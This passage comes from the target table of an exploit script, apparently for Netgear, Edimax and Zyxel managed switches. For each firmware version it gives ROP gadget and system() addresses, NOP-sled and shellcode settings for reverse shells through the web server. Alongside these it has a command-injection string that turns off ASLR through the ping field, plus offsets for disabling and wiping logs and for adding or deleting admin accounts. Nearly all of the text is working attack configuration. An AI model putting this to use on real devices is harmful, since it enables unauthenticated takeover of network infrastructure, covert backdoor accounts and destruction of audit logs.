						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f99853c</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484ae5c</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">6</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'639-73124'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Netgear'</span><span class="token punctuation">,</span>						<span class="token comment"># Static for the vendor</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.netgear.com/support/product/GS752TPv2#Firmware%20Version%206.0.0.37'</span><span class="token punctuation">,</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'6.0.0.37'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'hash_uri'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># tailed 'hash=' md5 hashed URI as csrf token</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'encode'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=USERNAME&amp;pwd=PASSWORD&amp;err_flag=0&amp;err_msg=&amp;submt=&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;pwd=NOP&amp;err_flag=0&amp;err_msg=&amp;submt=&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x45778C</span><span class="token punctuation">,</span>				<span class="token comment"># Direct heap address for NOP slep and shellcode</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998538</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484afec</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">6</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># EdimaxPRO</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : Yes</span>
			<span class="token comment"># Del /mntlog/flash.log  : Yes</span>
			<span class="token comment"># Add credentials        : Yes</span>
			<span class="token comment"># Del credentials        : Yes</span>
			<span class="token comment">#</span>
			<span class="token string">'225-63242'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Edimax'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS-5424PLC'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc'</span><span class="token punctuation">,</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.1.1.5'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248411bc</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()</span>
						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x40DFF4</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvHost=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>

						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x41D99C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x41D8E4</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x41D8E4</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x41620C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x41620C</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x41620C</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>			<span class="token comment"># Not clear, may be to long URI for the stack</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token string">'225-96283'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Edimax'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS-5424PLC'</span><span class="token punctuation">,</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/smb_switches_poe/gs-5424plc'</span><span class="token punctuation">,</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'1.1.1.6'</span><span class="token punctuation">,</span>					<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40E6DC</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998524</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x248411ac</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi;  cgi_diag_traceroute_set()</span>
						<span class="token comment"># traceroute</span>
						<span class="token string">'web_sys_ping_post'</span><span class="token punctuation">:</span><span class="token number">0x40E024</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'sys_ping_post_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;srvHost=127.0.0.1 ;echo 0 &gt; /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check;&amp;count=1'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_check'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>

						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x41D9EC</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x41D934</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x41D934</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntp_set'</span><span class="token punctuation">:</span><span class="token number">0x416254</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Set SNTP Server (Inject RCE)</span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSntpDel_set'</span><span class="token punctuation">:</span><span class="token number">0x416254</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Delete (address, binary dependent) </span>
														<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()</span>
						<span class="token string">'sys_timeSettings_set'</span><span class="token punctuation">:</span><span class="token number">0x416254</span><span class="token punctuation">,</span><span class="token comment"># Jump one after 'sw $ra'			# Enable/Disable (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'cgi'</span><span class="token punctuation">:</span><span class="token string">'set.cgi'</span><span class="token punctuation">,</span>				<span class="token comment"># /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()</span>
						<span class="token string">'START'</span><span class="token punctuation">:</span><span class="token number">0x7ffeff04</span><span class="token punctuation">,</span>				<span class="token comment"># start: Stack overflow RA, used for searching NOP sled by blind jump</span>
						<span class="token string">'STOP'</span><span class="token punctuation">:</span><span class="token number">0x7fc60000</span><span class="token punctuation">,</span>				<span class="token comment"># end: You may want to play with this if you dont get it working</span>
						<span class="token string">'usr_nop'</span><span class="token punctuation">:</span> <span class="token number">64</span><span class="token punctuation">,</span>					<span class="token comment"># NOP sled (shellcode will be tailed)</span>
						<span class="token string">'pwd_nop'</span><span class="token punctuation">:</span> <span class="token number">77</span><span class="token punctuation">,</span>					<span class="token comment"># filler/garbage (not used for something constructive)</span>
						<span class="token string">'align'</span><span class="token punctuation">:</span> <span class="token number">3</span><span class="token punctuation">,</span>						<span class="token comment"># Align opcodes in memory</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>					<span class="token comment"># NOP and shellcode lays on: True = stack, False = Heap</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token comment">#</span>
			<span class="token comment"># Zyxel</span>
			<span class="token comment">#</span>
			<span class="token comment"># CGI Reverse Shell      : Yes</span>
			<span class="token comment"># Boa/Hydra reverse shell: Yes</span>
			<span class="token comment"># Del /var/log/ram.log   : Yes</span>
			<span class="token comment"># Del /var/log/flash.log : No</span>
			<span class="token comment"># Del /mntlog/flash.log  : No</span>
			<span class="token comment"># Add credentials        : Yes (adding username to next free index number, may not be #1)</span>
			<span class="token comment"># Del credentials        : Yes (index number instead of username, may not be #1)</span>
			<span class="token comment">#</span>
			<span class="token string">'222-71560'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'template'</span><span class="token punctuation">:</span><span class="token string">'Zyxel'</span><span class="token punctuation">,</span>					<span class="token comment"># Static for the vendor</span>
				<span class="token string">'version'</span><span class="token punctuation">:</span><span class="token string">'2.40_AAHL.1_20180705'</span><span class="token punctuation">,</span>	<span class="token comment"># Version / binary dependent stuff</span>
				<span class="token string">'model'</span><span class="token punctuation">:</span><span class="token string">'GS1900-24'</span><span class="token punctuation">,</span>				<span class="token comment"># Model</span>
				<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'https://www.zyxel.com/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/'</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/bin/boa; embedparse() </span>
						<span class="token string">'gadget'</span><span class="token punctuation">:</span> <span class="token number">0x40D60C</span><span class="token punctuation">,</span>				<span class="token comment"># Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'system'</span><span class="token punctuation">:</span> <span class="token number">0x8f998520</span><span class="token punctuation">,</span>			<span class="token comment"># la $t9, system) # opcode, binary dependent</span>
														<span class="token comment"># /sqfs/bin/boa; read_body(); </span>
						<span class="token string">'handler'</span><span class="token punctuation">:</span> <span class="token number">0x2484e148</span><span class="token punctuation">,</span>			<span class="token comment"># addiu $a0, (.ascii "handler -c boa &amp;" - 0x430000) # (opcode, binary dependent)</span>
						<span class="token string">'v0'</span><span class="token punctuation">:</span> <span class="token number">7</span><span class="token punctuation">,</span>						<span class="token comment"># Should leave as-is (but you can play between 5 - 8)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>				<span class="token comment"># Not vulnerable</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x4341C4</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUser_post()</span></code></pre>
<div class="wrapper">
<div class="main-panel ps-container ps-theme-default ps-active-y" data-ps-id="dd13f15b-1faa-eee8-11f8-6ab614585dcf">
<div class="content">
<div class="row">
<div class="col-md-12">
<div class="card">
<div class="card-body">
<div class="code-toolbar">
<pre class=" language-py"><code class=" language-py">						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x436D9C</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;usrName=USERNAME&amp;usrPrivType=15&amp;usrPriv=15'</span><span class="token punctuation">,</span>			<span class="token comment"># Admin, priv 15</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment">#</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_sys_localUserDel_post()</span>
						<span class="token string">'address'</span><span class="token punctuation">:</span><span class="token number">0x437124</span><span class="token punctuation">,</span>				<span class="token comment"># Jump one after 'sw $ra'			# (address, binary dependent)</span>
						<span class="token string">'account'</span><span class="token punctuation">:</span><span class="token string">'&amp;_del=1'</span><span class="token punctuation">,</span>			<span class="token comment"># First additional user in the list</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># user</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_setting_post()</span>
						<span class="token string">'log_settings_set'</span><span class="token punctuation">:</span><span class="token number">0x47D760</span><span class="token punctuation">,</span>	<span class="token comment"># Jump one after 'sw $ra'			# Disable Logging (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()</span>
						<span class="token string">'log_ramClear'</span><span class="token punctuation">:</span><span class="token number">0x480804</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean RAM log (address, binary dependent)</span>
														<span class="token comment"># /sqfs/home/web/cgi-bin/dispatcher.cgi;  web_log_delete_post()</span>
						<span class="token string">'log_fileClear'</span><span class="token punctuation">:</span><span class="token number">0x480804</span><span class="token punctuation">,</span>		<span class="token comment"># Jump one after 'sw $ra'			# Clean FILE log (address, binary dependent)</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># </span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
